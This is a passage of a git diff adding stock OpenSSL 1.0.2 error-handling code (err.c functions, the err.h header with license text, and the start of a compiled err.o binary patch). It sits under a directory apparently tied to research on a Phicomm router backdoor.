+    es = ERR_get_state();
+
+    es->top = (es->top + 1) % ERR_NUM_ERRORS;
+    if (es->top == es->bottom)
+        es->bottom = (es->bottom + 1) % ERR_NUM_ERRORS;
+    es->err_flags[es->top] = 0;
+    es->err_buffer[es->top] = ERR_PACK(lib, func, reason);
+    es->err_file[es->top] = file;
+    es->err_line[es->top] = line;
+    err_clear_data(es, es->top);
+}
+
+void ERR_clear_error(void)
+{
+    int i;
+    ERR_STATE *es;
+
+    es = ERR_get_state();
+
+    for (i = 0; i < ERR_NUM_ERRORS; i++) {
+        err_clear(es, i);
+    }
+    es->top = es->bottom = 0;
+}
+
+unsigned long ERR_get_error(void)
+{
+    return (get_error_values(1, 0, NULL, NULL, NULL, NULL));
+}
+
+unsigned long ERR_get_error_line(const char **file, int *line)
+{
+    return (get_error_values(1, 0, file, line, NULL, NULL));
+}
+
+unsigned long ERR_get_error_line_data(const char **file, int *line,
+                                      const char **data, int *flags)
+{
+    return (get_error_values(1, 0, file, line, data, flags));
+}
+
+unsigned long ERR_peek_error(void)
+{
+    return (get_error_values(0, 0, NULL, NULL, NULL, NULL));
+}
+
+unsigned long ERR_peek_error_line(const char **file, int *line)
+{
+    return (get_error_values(0, 0, file, line, NULL, NULL));
+}
+
+unsigned long ERR_peek_error_line_data(const char **file, int *line,
+                                       const char **data, int *flags)
+{
+    return (get_error_values(0, 0, file, line, data, flags));
+}
+
+unsigned long ERR_peek_last_error(void)
+{
+    return (get_error_values(0, 1, NULL, NULL, NULL, NULL));
+}
+
+unsigned long ERR_peek_last_error_line(const char **file, int *line)
+{
+    return (get_error_values(0, 1, file, line, NULL, NULL));
+}
+
+unsigned long ERR_peek_last_error_line_data(const char **file, int *line,
+                                            const char **data, int *flags)
+{
+    return (get_error_values(0, 1, file, line, data, flags));
+}
+
+static unsigned long get_error_values(int inc, int top, const char **file,
+                                      int *line, const char **data,
+                                      int *flags)
+{
+    int i = 0;
+    ERR_STATE *es;
+    unsigned long ret;
+
+    es = ERR_get_state();
+
+    if (inc && top) {
+        if (file)
+            *file = "";
+        if (line)
+            *line = 0;
+        if (data)
+            *data = "";
+        if (flags)
+            *flags = 0;
+
+        return ERR_R_INTERNAL_ERROR;
+    }
+
+    if (es->bottom == es->top)
+        return 0;
+    if (top)
+        i = es->top;            /* last error */
+    else
+        i = (es->bottom + 1) % ERR_NUM_ERRORS; /* first error */
+
+    ret = es->err_buffer[i];
+    if (inc) {
+        es->bottom = i;
+        es->err_buffer[i] = 0;
+    }
+
+    if ((file != NULL) && (line != NULL)) {
+        if (es->err_file[i] == NULL) {
+            *file = "NA";
+            if (line != NULL)
+                *line = 0;
+        } else {
+            *file = es->err_file[i];
+            if (line != NULL)
+                *line = es->err_line[i];
+        }
+    }
+
+    if (data == NULL) {
+        if (inc) {
+            err_clear_data(es, i);
+        }
+    } else {
+        if (es->err_data[i] == NULL) {
+            *data = "";
+            if (flags != NULL)
+                *flags = 0;
+        } else {
+            *data = es->err_data[i];
+            if (flags != NULL)
+                *flags = es->err_data_flags[i];
+        }
+    }
+    return ret;
+}
+
+void ERR_error_string_n(unsigned long e, char *buf, size_t len)
+{
+    char lsbuf[64], fsbuf[64], rsbuf[64];
+    const char *ls, *fs, *rs;
+    unsigned long l, f, r;
+
+    l = ERR_GET_LIB(e);
+    f = ERR_GET_FUNC(e);
+    r = ERR_GET_REASON(e);
+
+    ls = ERR_lib_error_string(e);
+    fs = ERR_func_error_string(e);
+    rs = ERR_reason_error_string(e);
+
+    if (ls == NULL)
+        BIO_snprintf(lsbuf, sizeof(lsbuf), "lib(%lu)", l);
+    if (fs == NULL)
+        BIO_snprintf(fsbuf, sizeof(fsbuf), "func(%lu)", f);
+    if (rs == NULL)
+        BIO_snprintf(rsbuf, sizeof(rsbuf), "reason(%lu)", r);
+
+    BIO_snprintf(buf, len, "error:%08lX:%s:%s:%s", e, ls ? ls : lsbuf,
+                 fs ? fs : fsbuf, rs ? rs : rsbuf);
+    if (strlen(buf) == len - 1) {
+        /*
+         * output may be truncated; make sure we always have 5
+         * colon-separated fields, i.e. 4 colons ...
+         */
+#define NUM_COLONS 4
+        if (len > NUM_COLONS) { /* ... if possible */
+            int i;
+            char *s = buf;
+
+            for (i = 0; i < NUM_COLONS; i++) {
+                char *colon = strchr(s, ':');
+                if (colon == NULL || colon > &buf[len - 1] - NUM_COLONS + i) {
+                    /*
+                     * set colon no. i at last possible position (buf[len-1]
+                     * is the terminating 0)
+                     */
+                    colon = &buf[len - 1] - NUM_COLONS + i;
+                    *colon = ':';
+                }
+                s = colon + 1;
+            }
+        }
+    }
+}
+
+/* BAD for multi-threading: uses a local buffer if ret == NULL */
+/*
+ * ERR_error_string_n should be used instead for ret != NULL as
+ * ERR_error_string cannot know how large the buffer is
+ */
+char *ERR_error_string(unsigned long e, char *ret)
+{
+    static char buf[256];
+
+    if (ret == NULL)
+        ret = buf;
+    ERR_error_string_n(e, ret, 256);
+
+    return ret;
+}
+
+LHASH_OF(ERR_STRING_DATA) *ERR_get_string_table(void)
+{
+    err_fns_check();
+    return ERRFN(err_get) (0);
+}
+
+LHASH_OF(ERR_STATE) *ERR_get_err_state_table(void)
+{
+    err_fns_check();
+    return ERRFN(thread_get) (0);
+}
+
+void ERR_release_err_state_table(LHASH_OF(ERR_STATE) **hash)
+{
+    err_fns_check();
+    ERRFN(thread_release) (hash);
+}
+
+const char *ERR_lib_error_string(unsigned long e)
+{
+    ERR_STRING_DATA d, *p;
+    unsigned long l;
+
+    err_fns_check();
+    l = ERR_GET_LIB(e);
+    d.error = ERR_PACK(l, 0, 0);
+    p = ERRFN(err_get_item) (&d);
+    return ((p == NULL) ? NULL : p->string);
+}
+
+const char *ERR_func_error_string(unsigned long e)
+{
+    ERR_STRING_DATA d, *p;
+    unsigned long l, f;
+
+    err_fns_check();
+    l = ERR_GET_LIB(e);
+    f = ERR_GET_FUNC(e);
+    d.error = ERR_PACK(l, f, 0);
+    p = ERRFN(err_get_item) (&d);
+    return ((p == NULL) ? NULL : p->string);
+}
+
+const char *ERR_reason_error_string(unsigned long e)
+{
+    ERR_STRING_DATA d, *p = NULL;
+    unsigned long l, r;
+
+    err_fns_check();
+    l = ERR_GET_LIB(e);
+    r = ERR_GET_REASON(e);
+    d.error = ERR_PACK(l, 0, r);
+    p = ERRFN(err_get_item) (&d);
+    if (!p) {
+        d.error = ERR_PACK(0, 0, r);
+        p = ERRFN(err_get_item) (&d);
+    }
+    return ((p == NULL) ? NULL : p->string);
+}
+
+void ERR_remove_thread_state(const CRYPTO_THREADID *id)
+{
+    ERR_STATE tmp;
+
+    if (id)
+        CRYPTO_THREADID_cpy(&tmp.tid, id);
+    else
+        CRYPTO_THREADID_current(&tmp.tid);
+    err_fns_check();
+    /*
+     * thread_del_item automatically destroys the LHASH if the number of
+     * items reaches zero.
+     */
+    ERRFN(thread_del_item) (&tmp);
+}
+
+#ifndef OPENSSL_NO_DEPRECATED
+void ERR_remove_state(unsigned long pid)
+{
+    ERR_remove_thread_state(NULL);
+}
+#endif
+
+ERR_STATE *ERR_get_state(void)
+{
+    static ERR_STATE fallback;
+    ERR_STATE *ret, tmp, *tmpp = NULL;
+    int i;
+    CRYPTO_THREADID tid;
+
+    err_fns_check();
+    CRYPTO_THREADID_current(&tid);
+    CRYPTO_THREADID_cpy(&tmp.tid, &tid);
+    ret = ERRFN(thread_get_item) (&tmp);
+
+    /* ret == the error state, if NULL, make a new one */
+    if (ret == NULL) {
+        ret = (ERR_STATE *)OPENSSL_malloc(sizeof(ERR_STATE));
+        if (ret == NULL)
+            return (&fallback);
+        CRYPTO_THREADID_cpy(&ret->tid, &tid);
+        ret->top = 0;
+        ret->bottom = 0;
+        for (i = 0; i < ERR_NUM_ERRORS; i++) {
+            ret->err_data[i] = NULL;
+            ret->err_data_flags[i] = 0;
+        }
+        tmpp = ERRFN(thread_set_item) (ret);
+        /* To check if insertion failed, do a get. */
+        if (ERRFN(thread_get_item) (ret) != ret) {
+            ERR_STATE_free(ret); /* could not insert it */
+            return (&fallback);
+        }
+        /*
+         * If a race occured in this function and we came second, tmpp is the
+         * first one that we just replaced.
+         */
+        if (tmpp)
+            ERR_STATE_free(tmpp);
+    }
+    return ret;
+}
+
+int ERR_get_next_error_library(void)
+{
+    err_fns_check();
+    return ERRFN(get_next_lib) ();
+}
+
+void ERR_set_error_data(char *data, int flags)
+{
+    ERR_STATE *es;
+    int i;
+
+    es = ERR_get_state();
+
+    i = es->top;
+    if (i == 0)
+        i = ERR_NUM_ERRORS - 1;
+
+    err_clear_data(es, i);
+    es->err_data[i] = data;
+    es->err_data_flags[i] = flags;
+}
+
+void ERR_add_error_data(int num, ...)
+{
+    va_list args;
+    va_start(args, num);
+    ERR_add_error_vdata(num, args);
+    va_end(args);
+}
+
+void ERR_add_error_vdata(int num, va_list args)
+{
+    int i, n, s;
+    char *str, *p, *a;
+
+    s = 80;
+    str = OPENSSL_malloc(s + 1);
+    if (str == NULL)
+        return;
+    str[0] = '\0';
+
+    n = 0;
+    for (i = 0; i < num; i++) {
+        a = va_arg(args, char *);
+        /* ignore NULLs, thanks to Bob Beck <beck@obtuse.com> */
+        if (a != NULL) {
+            n += strlen(a);
+            if (n > s) {
+                s = n + 20;
+                p = OPENSSL_realloc(str, s + 1);
+                if (p == NULL) {
+                    OPENSSL_free(str);
+                    return;
+                } else
+                    str = p;
+            }
+            BUF_strlcat(str, a, (size_t)s + 1);
+        }
+    }
+    ERR_set_error_data(str, ERR_TXT_MALLOCED | ERR_TXT_STRING);
+}
+
+int ERR_set_mark(void)
+{
+    ERR_STATE *es;
+
+    es = ERR_get_state();
+
+    if (es->bottom == es->top)
+        return 0;
+    es->err_flags[es->top] |= ERR_FLAG_MARK;
+    return 1;
+}
+
+int ERR_pop_to_mark(void)
+{
+    ERR_STATE *es;
+
+    es = ERR_get_state();
+
+    while (es->bottom != es->top
+           && (es->err_flags[es->top] & ERR_FLAG_MARK) == 0) {
+        err_clear(es, es->top);
+        es->top -= 1;
+        if (es->top == -1)
+            es->top = ERR_NUM_ERRORS - 1;
+    }
+
+    if (es->bottom == es->top)
+        return 0;
+    es->err_flags[es->top] &= ~ERR_FLAG_MARK;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.h
new file mode 100644
index 0000000..585aa8b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.h
@@ -0,0 +1,389 @@
+/* crypto/err/err.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_ERR_H
+# define HEADER_ERR_H
+
+# include <openssl/e_os2.h>
+
+# ifndef OPENSSL_NO_FP_API
+#  include <stdio.h>
+#  include <stdlib.h>
+# endif
+
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# ifndef OPENSSL_NO_LHASH
+#  include <openssl/lhash.h>
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifndef OPENSSL_NO_ERR
+#  define ERR_PUT_error(a,b,c,d,e)        ERR_put_error(a,b,c,d,e)
+# else
+#  define ERR_PUT_error(a,b,c,d,e)        ERR_put_error(a,b,c,NULL,0)
+# endif
+
+# include <errno.h>
+
+# define ERR_TXT_MALLOCED        0x01
+# define ERR_TXT_STRING          0x02
+
+# define ERR_FLAG_MARK           0x01
+
+# define ERR_NUM_ERRORS  16
+typedef struct err_state_st {
+    CRYPTO_THREADID tid;
+    int err_flags[ERR_NUM_ERRORS];
+    unsigned long err_buffer[ERR_NUM_ERRORS];
+    char *err_data[ERR_NUM_ERRORS];
+    int err_data_flags[ERR_NUM_ERRORS];
+    const char *err_file[ERR_NUM_ERRORS];
+    int err_line[ERR_NUM_ERRORS];
+    int top, bottom;
+} ERR_STATE;
+
+/* library */
+# define ERR_LIB_NONE            1
+# define ERR_LIB_SYS             2
+# define ERR_LIB_BN              3
+# define ERR_LIB_RSA             4
+# define ERR_LIB_DH              5
+# define ERR_LIB_EVP             6
+# define ERR_LIB_BUF             7
+# define ERR_LIB_OBJ             8
+# define ERR_LIB_PEM             9
+# define ERR_LIB_DSA             10
+# define ERR_LIB_X509            11
+/* #define ERR_LIB_METH         12 */
+# define ERR_LIB_ASN1            13
+# define ERR_LIB_CONF            14
+# define ERR_LIB_CRYPTO          15
+# define ERR_LIB_EC              16
+# define ERR_LIB_SSL             20
+/* #define ERR_LIB_SSL23        21 */
+/* #define ERR_LIB_SSL2         22 */
+/* #define ERR_LIB_SSL3         23 */
+/* #define ERR_LIB_RSAREF       30 */
+/* #define ERR_LIB_PROXY        31 */
+# define ERR_LIB_BIO             32
+# define ERR_LIB_PKCS7           33
+# define ERR_LIB_X509V3          34
+# define ERR_LIB_PKCS12          35
+# define ERR_LIB_RAND            36
+# define ERR_LIB_DSO             37
+# define ERR_LIB_ENGINE          38
+# define ERR_LIB_OCSP            39
+# define ERR_LIB_UI              40
+# define ERR_LIB_COMP            41
+# define ERR_LIB_ECDSA           42
+# define ERR_LIB_ECDH            43
+# define ERR_LIB_STORE           44
+# define ERR_LIB_FIPS            45
+# define ERR_LIB_CMS             46
+# define ERR_LIB_TS              47
+# define ERR_LIB_HMAC            48
+# define ERR_LIB_JPAKE           49
+
+# define ERR_LIB_USER            128
+
+# define SYSerr(f,r)  ERR_PUT_error(ERR_LIB_SYS,(f),(r),__FILE__,__LINE__)
+# define BNerr(f,r)   ERR_PUT_error(ERR_LIB_BN,(f),(r),__FILE__,__LINE__)
+# define RSAerr(f,r)  ERR_PUT_error(ERR_LIB_RSA,(f),(r),__FILE__,__LINE__)
+# define DHerr(f,r)   ERR_PUT_error(ERR_LIB_DH,(f),(r),__FILE__,__LINE__)
+# define EVPerr(f,r)  ERR_PUT_error(ERR_LIB_EVP,(f),(r),__FILE__,__LINE__)
+# define BUFerr(f,r)  ERR_PUT_error(ERR_LIB_BUF,(f),(r),__FILE__,__LINE__)
+# define OBJerr(f,r)  ERR_PUT_error(ERR_LIB_OBJ,(f),(r),__FILE__,__LINE__)
+# define PEMerr(f,r)  ERR_PUT_error(ERR_LIB_PEM,(f),(r),__FILE__,__LINE__)
+# define DSAerr(f,r)  ERR_PUT_error(ERR_LIB_DSA,(f),(r),__FILE__,__LINE__)
+# define X509err(f,r) ERR_PUT_error(ERR_LIB_X509,(f),(r),__FILE__,__LINE__)
+# define ASN1err(f,r) ERR_PUT_error(ERR_LIB_ASN1,(f),(r),__FILE__,__LINE__)
+# define CONFerr(f,r) ERR_PUT_error(ERR_LIB_CONF,(f),(r),__FILE__,__LINE__)
+# define CRYPTOerr(f,r) ERR_PUT_error(ERR_LIB_CRYPTO,(f),(r),__FILE__,__LINE__)
+# define ECerr(f,r)   ERR_PUT_error(ERR_LIB_EC,(f),(r),__FILE__,__LINE__)
+# define SSLerr(f,r)  ERR_PUT_error(ERR_LIB_SSL,(f),(r),__FILE__,__LINE__)
+# define BIOerr(f,r)  ERR_PUT_error(ERR_LIB_BIO,(f),(r),__FILE__,__LINE__)
+# define PKCS7err(f,r) ERR_PUT_error(ERR_LIB_PKCS7,(f),(r),__FILE__,__LINE__)
+# define X509V3err(f,r) ERR_PUT_error(ERR_LIB_X509V3,(f),(r),__FILE__,__LINE__)
+# define PKCS12err(f,r) ERR_PUT_error(ERR_LIB_PKCS12,(f),(r),__FILE__,__LINE__)
+# define RANDerr(f,r) ERR_PUT_error(ERR_LIB_RAND,(f),(r),__FILE__,__LINE__)
+# define DSOerr(f,r) ERR_PUT_error(ERR_LIB_DSO,(f),(r),__FILE__,__LINE__)
+# define ENGINEerr(f,r) ERR_PUT_error(ERR_LIB_ENGINE,(f),(r),__FILE__,__LINE__)
+# define OCSPerr(f,r) ERR_PUT_error(ERR_LIB_OCSP,(f),(r),__FILE__,__LINE__)
+# define UIerr(f,r) ERR_PUT_error(ERR_LIB_UI,(f),(r),__FILE__,__LINE__)
+# define COMPerr(f,r) ERR_PUT_error(ERR_LIB_COMP,(f),(r),__FILE__,__LINE__)
+# define ECDSAerr(f,r)  ERR_PUT_error(ERR_LIB_ECDSA,(f),(r),__FILE__,__LINE__)
+# define ECDHerr(f,r)  ERR_PUT_error(ERR_LIB_ECDH,(f),(r),__FILE__,__LINE__)
+# define STOREerr(f,r) ERR_PUT_error(ERR_LIB_STORE,(f),(r),__FILE__,__LINE__)
+# define FIPSerr(f,r) ERR_PUT_error(ERR_LIB_FIPS,(f),(r),__FILE__,__LINE__)
+# define CMSerr(f,r) ERR_PUT_error(ERR_LIB_CMS,(f),(r),__FILE__,__LINE__)
+# define TSerr(f,r) ERR_PUT_error(ERR_LIB_TS,(f),(r),__FILE__,__LINE__)
+# define HMACerr(f,r) ERR_PUT_error(ERR_LIB_HMAC,(f),(r),__FILE__,__LINE__)
+# define JPAKEerr(f,r) ERR_PUT_error(ERR_LIB_JPAKE,(f),(r),__FILE__,__LINE__)
+
+/*
+ * Borland C seems too stupid to be able to shift and do longs in the
+ * pre-processor :-(
+ */
+# define ERR_PACK(l,f,r)         (((((unsigned long)l)&0xffL)*0x1000000)| \
+                                ((((unsigned long)f)&0xfffL)*0x1000)| \
+                                ((((unsigned long)r)&0xfffL)))
+# define ERR_GET_LIB(l)          (int)((((unsigned long)l)>>24L)&0xffL)
+# define ERR_GET_FUNC(l)         (int)((((unsigned long)l)>>12L)&0xfffL)
+# define ERR_GET_REASON(l)       (int)((l)&0xfffL)
+# define ERR_FATAL_ERROR(l)      (int)((l)&ERR_R_FATAL)
+
+/* OS functions */
+# define SYS_F_FOPEN             1
+# define SYS_F_CONNECT           2
+# define SYS_F_GETSERVBYNAME     3
+# define SYS_F_SOCKET            4
+# define SYS_F_IOCTLSOCKET       5
+# define SYS_F_BIND              6
+# define SYS_F_LISTEN            7
+# define SYS_F_ACCEPT            8
+# define SYS_F_WSASTARTUP        9/* Winsock stuff */
+# define SYS_F_OPENDIR           10
+# define SYS_F_FREAD             11
+
+/* reasons */
+# define ERR_R_SYS_LIB   ERR_LIB_SYS/* 2 */
+# define ERR_R_BN_LIB    ERR_LIB_BN/* 3 */
+# define ERR_R_RSA_LIB   ERR_LIB_RSA/* 4 */
+# define ERR_R_DH_LIB    ERR_LIB_DH/* 5 */
+# define ERR_R_EVP_LIB   ERR_LIB_EVP/* 6 */
+# define ERR_R_BUF_LIB   ERR_LIB_BUF/* 7 */
+# define ERR_R_OBJ_LIB   ERR_LIB_OBJ/* 8 */
+# define ERR_R_PEM_LIB   ERR_LIB_PEM/* 9 */
+# define ERR_R_DSA_LIB   ERR_LIB_DSA/* 10 */
+# define ERR_R_X509_LIB  ERR_LIB_X509/* 11 */
+# define ERR_R_ASN1_LIB  ERR_LIB_ASN1/* 13 */
+# define ERR_R_CONF_LIB  ERR_LIB_CONF/* 14 */
+# define ERR_R_CRYPTO_LIB ERR_LIB_CRYPTO/* 15 */
+# define ERR_R_EC_LIB    ERR_LIB_EC/* 16 */
+# define ERR_R_SSL_LIB   ERR_LIB_SSL/* 20 */
+# define ERR_R_BIO_LIB   ERR_LIB_BIO/* 32 */
+# define ERR_R_PKCS7_LIB ERR_LIB_PKCS7/* 33 */
+# define ERR_R_X509V3_LIB ERR_LIB_X509V3/* 34 */
+# define ERR_R_PKCS12_LIB ERR_LIB_PKCS12/* 35 */
+# define ERR_R_RAND_LIB  ERR_LIB_RAND/* 36 */
+# define ERR_R_DSO_LIB   ERR_LIB_DSO/* 37 */
+# define ERR_R_ENGINE_LIB ERR_LIB_ENGINE/* 38 */
+# define ERR_R_OCSP_LIB  ERR_LIB_OCSP/* 39 */
+# define ERR_R_UI_LIB    ERR_LIB_UI/* 40 */
+# define ERR_R_COMP_LIB  ERR_LIB_COMP/* 41 */
+# define ERR_R_ECDSA_LIB ERR_LIB_ECDSA/* 42 */
+# define ERR_R_ECDH_LIB  ERR_LIB_ECDH/* 43 */
+# define ERR_R_STORE_LIB ERR_LIB_STORE/* 44 */
+# define ERR_R_TS_LIB    ERR_LIB_TS/* 45 */
+
+# define ERR_R_NESTED_ASN1_ERROR                 58
+# define ERR_R_BAD_ASN1_OBJECT_HEADER            59
+# define ERR_R_BAD_GET_ASN1_OBJECT_CALL          60
+# define ERR_R_EXPECTING_AN_ASN1_SEQUENCE        61
+# define ERR_R_ASN1_LENGTH_MISMATCH              62
+# define ERR_R_MISSING_ASN1_EOS                  63
+
+/* fatal error */
+# define ERR_R_FATAL                             64
+# define ERR_R_MALLOC_FAILURE                    (1|ERR_R_FATAL)
+# define ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED       (2|ERR_R_FATAL)
+# define ERR_R_PASSED_NULL_PARAMETER             (3|ERR_R_FATAL)
+# define ERR_R_INTERNAL_ERROR                    (4|ERR_R_FATAL)
+# define ERR_R_DISABLED                          (5|ERR_R_FATAL)
+
+/*
+ * 99 is the maximum possible ERR_R_... code, higher values are reserved for
+ * the individual libraries
+ */
+
+typedef struct ERR_string_data_st {
+    unsigned long error;
+    const char *string;
+} ERR_STRING_DATA;
+
+void ERR_put_error(int lib, int func, int reason, const char *file, int line);
+void ERR_set_error_data(char *data, int flags);
+
+unsigned long ERR_get_error(void);
+unsigned long ERR_get_error_line(const char **file, int *line);
+unsigned long ERR_get_error_line_data(const char **file, int *line,
+                                      const char **data, int *flags);
+unsigned long ERR_peek_error(void);
+unsigned long ERR_peek_error_line(const char **file, int *line);
+unsigned long ERR_peek_error_line_data(const char **file, int *line,
+                                       const char **data, int *flags);
+unsigned long ERR_peek_last_error(void);
+unsigned long ERR_peek_last_error_line(const char **file, int *line);
+unsigned long ERR_peek_last_error_line_data(const char **file, int *line,
+                                            const char **data, int *flags);
+void ERR_clear_error(void);
+char *ERR_error_string(unsigned long e, char *buf);
+void ERR_error_string_n(unsigned long e, char *buf, size_t len);
+const char *ERR_lib_error_string(unsigned long e);
+const char *ERR_func_error_string(unsigned long e);
+const char *ERR_reason_error_string(unsigned long e);
+void ERR_print_errors_cb(int (*cb) (const char *str, size_t len, void *u),
+                         void *u);
+# ifndef OPENSSL_NO_FP_API
+void ERR_print_errors_fp(FILE *fp);
+# endif
+# ifndef OPENSSL_NO_BIO
+void ERR_print_errors(BIO *bp);
+# endif
+void ERR_add_error_data(int num, ...);
+void ERR_add_error_vdata(int num, va_list args);
+void ERR_load_strings(int lib, ERR_STRING_DATA str[]);
+void ERR_unload_strings(int lib, ERR_STRING_DATA str[]);
+void ERR_load_ERR_strings(void);
+void ERR_load_crypto_strings(void);
+void ERR_free_strings(void);
+
+void ERR_remove_thread_state(const CRYPTO_THREADID *tid);
+# ifndef OPENSSL_NO_DEPRECATED
+void ERR_remove_state(unsigned long pid); /* if zero we look it up */
+# endif
+ERR_STATE *ERR_get_state(void);
+
+# ifndef OPENSSL_NO_LHASH
+LHASH_OF(ERR_STRING_DATA) *ERR_get_string_table(void);
+LHASH_OF(ERR_STATE) *ERR_get_err_state_table(void);
+void ERR_release_err_state_table(LHASH_OF(ERR_STATE) **hash);
+# endif
+
+int ERR_get_next_error_library(void);
+
+int ERR_set_mark(void);
+int ERR_pop_to_mark(void);
+
+/* Already defined in ossl_typ.h */
+/* typedef struct st_ERR_FNS ERR_FNS; */
+/*
+ * An application can use this function and provide the return value to
+ * loaded modules that should use the application's ERR state/functionality
+ */
+const ERR_FNS *ERR_get_implementation(void);
+/*
+ * A loaded module should call this function prior to any ERR operations
+ * using the application's "ERR_FNS".
+ */
+int ERR_set_implementation(const ERR_FNS *fns);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err.o
new file mode 100644
index 0000000000000000000000000000000000000000..f3f401ad99cec78a0d0f0c33d2b0889a25282702
GIT binary patch
literal 18120
zcmche4|r77mB3#n0Ro0eP^{^yZEOb#YSWCM1hj1?nSnQT0s~2G1a%0>#L$E!oy;Kg
z!<IOS_U$;z7TwzIKl^QW*KV!V{&5NVK`_9;S9MXh#V*#;iZwA>Q4vv!v*+A<&dkZn
zO#AiQ{q}xl-h01$?z!ild+wk2E`HS)Smr1wFgO($pEa^iObz2;UG~0K-PRgqMyc^m
